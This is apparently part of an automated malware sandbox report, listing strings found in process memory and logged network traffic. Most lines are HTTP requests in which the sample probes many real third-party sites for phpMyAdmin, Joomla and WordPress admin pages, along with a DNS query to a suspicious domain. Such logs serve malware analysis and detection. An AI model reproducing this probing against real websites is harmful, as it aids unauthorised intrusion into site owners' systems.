                      Source: explorer.exe, 00000002.00000000.2198779085.000000000C048000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.come
                      Source: explorer.exe, 00000002.00000000.2198779085.000000000BFEF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comEMd
                      Source: 501B.exe, 00000011.00000003.3462791853.0000000003EED000.00000004.00000020.00020000.00000000.sdmp, 501B.exe, 00000011.00000003.3459605782.0000000003AC2000.00000004.00000020.00020000.00000000.sdmp, 501B.exe, 00000011.00000003.3460236766.0000000003C29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sabotage.net
                      Source: explorer.exe, 00000002.00000000.2194331935.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
                      Source: explorer.exe, 00000002.00000000.2194331935.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
                      Source: explorer.exe, 00000002.00000000.2196926681.00000000099AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/e
                      Source: explorer.exe, 00000002.00000000.2198779085.000000000C048000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comM
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007F77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007F77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: explorer.exe, 00000002.00000000.2194331935.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-ei
                      Source: explorer.exe, 00000002.00000000.2194331935.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
                      Source: explorer.exe, 00000002.00000000.2194331935.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
                      Source: explorer.exe, 00000002.00000000.2194331935.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF
                      Source: explorer.exe, 00000002.00000000.2194331935.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
                      Source: explorer.exe, 00000002.00000000.2194331935.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
                      Source: explorer.exe, 00000002.00000000.2194331935.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h
                      Source: explorer.exe, 00000002.00000000.2194331935.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu
                      Source: explorer.exe, 00000002.00000000.2194331935.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
                      Source: explorer.exe, 00000002.00000000.2194331935.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
                      Source: explorer.exe, 00000002.00000000.2194331935.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
                      Source: explorer.exe, 00000002.00000000.2194331935.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-
                      Source: explorer.exe, 00000002.00000000.2194331935.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-
                      Source: explorer.exe, 00000002.00000000.2194331935.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
                      Source: explorer.exe, 00000002.00000000.2194331935.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
                      Source: unknownDNS traffic detected: queries for: onualituyrs.org
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: 3marc.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: khodyari.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: conceptualintegration.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: conceptualintegration.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: mgnbizlaw.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: la-morada.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: 3marc.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: mcsmk8.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: evropskypravnik.czAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: evropskypravnik.czAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: ext.byAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: mgnbizlaw.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: eremina.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: conceptualintegration.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: bokod.huAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: bokod.huAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: pfprojekt.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: la-morada.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: ext.byAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: eremina.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: jumpnsplashwear.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: jumpnsplashwear.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: khodyari.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: mgnbizlaw.comAccept: */*Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=10.116.80.178; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: hoster.byAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: mgnbizlaw.comAccept: */*Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=10.116.88.101; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: hoster.byAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: mgnbizlaw.comAccept: */*Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=10.116.88.246; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: mgnbizlaw.comAccept: */*Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=10.116.80.178; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://mgnbizlaw.com/administrator/
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: mgnbizlaw.comAccept: */*Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=10.119.144.218; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: mgnbizlaw.comAccept: */*Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=10.116.88.101; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://mgnbizlaw.com/administrator/
                      Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: khodyari.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: mgnbizlaw.comAccept: */*Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=10.116.88.246; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: khodyari.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: mgnbizlaw.comAccept: */*Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=10.116.88.246; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: mgnbizlaw.comAccept: */*Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=10.116.88.101; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /atoz/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: atozrental.cc
                      Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: malibusands.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: mgnbizlaw.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: mgnbizlaw.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: jumpnsplashwear.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: jumpnsplashwear.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: conceptualintegration.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: conceptualintegration.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: khodyari.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: mcsmk8.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: fedyanin.wsAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: fedyanin.wsAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: la-morada.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: eremina.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: malibusands.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://malibusands.net/administrator/
                      Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: jumpnsplashwear.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://jumpnsplashwear.com/administrator/
                      Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: mcsmk8.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://mcsmk8.com/administrator/
                      Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: fedyanin.wsAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://fedyanin.ws/administrator/
                      Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: fedyanin.wsAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://fedyanin.ws/administrator/
                      Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: jumpnsplashwear.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://jumpnsplashwear.com/administrator/
                      Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: eremina.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://eremina.net/administrator/
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: mcsmk8.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: 3marc.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: evropskypravnik.czAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: la-morada.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: mgnbizlaw.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: mgnbizlaw.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: 3marc.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: la-morada.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: evropskypravnik.czAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: bokod.huAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: bokod.huAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: eremina.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: conceptualintegration.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: 3marc.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: la-morada.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: fedyanin.wsAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://fedyanin.ws/administrator/
                      Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: fedyanin.wsAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://fedyanin.ws/administrator/
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: jumpnsplashwear.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: la-morada.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: bokod.huAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: pfprojekt.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: eremina.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: bokod.huAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: pfprojekt.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: 3marc.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://3marc.com/wp-login.php
                      Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: mcsmk8.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: evropskypravnik.czAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: evropskypravnik.czAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /Home/Login?ReturnUrl=%2fadministrator%2f HTTP/1.1Host: bokod.huAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /Home/Login?ReturnUrl=%2fadministrator%2f HTTP/1.1Host: bokod.huAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: eremina.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://eremina.net/administrator/
                      Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: 3marc.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: mgnbizlaw.comAccept: */*Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=10.116.88.246; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://mgnbizlaw.com/administrator/
                      Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: ershov.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: ershov.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: ershov.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: evropskypravnik.czAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: ershov.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: ershov.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
